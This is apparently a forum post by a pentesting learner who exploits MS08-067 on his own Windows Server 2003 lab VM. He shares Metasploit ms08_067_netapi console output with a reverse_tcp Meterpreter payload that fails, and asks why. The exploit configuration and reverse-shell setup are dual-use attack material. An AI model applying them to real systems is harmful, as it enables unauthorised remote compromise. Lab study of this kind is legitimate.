Hi,

First of all would like to say i LOVE backtrack!

Im learning about pentesting, and i have set up a Windows Server 2003 R2 virtual machine.

Scanning with nessus informs me of the well known vulnerability ms08-067.

Exploitation:

When i exploit this vulnerability using fast-track.py (the milw0rm code i believe), it works immediately and gives me a SYSTEM shell on the host.

However,

I would much prefer to use meterpreter for all of its features, so i try to use metasploit framework:

I set the options as follows, and the exploit fails with the following errors:

Code:
msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.76     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.64     yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   9   Windows 2003 SP2 English (NX)

msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)[*] Exploit completed, but no session was created.

msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.76     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)




Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.1.64     yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   9   Windows 2003 SP2 English (NX)

msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0[*] Started reverse handler
[-] Exploit failed: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)[*] Exploit completed, but no session was created.
Not manually selecting a target results in the error about being unable to determine a language pack.

Could somebody please help me work out why this does not work! As it works fine every time in fast-track.py but no possiblity of a meterpreter payload

Thanks,

Joe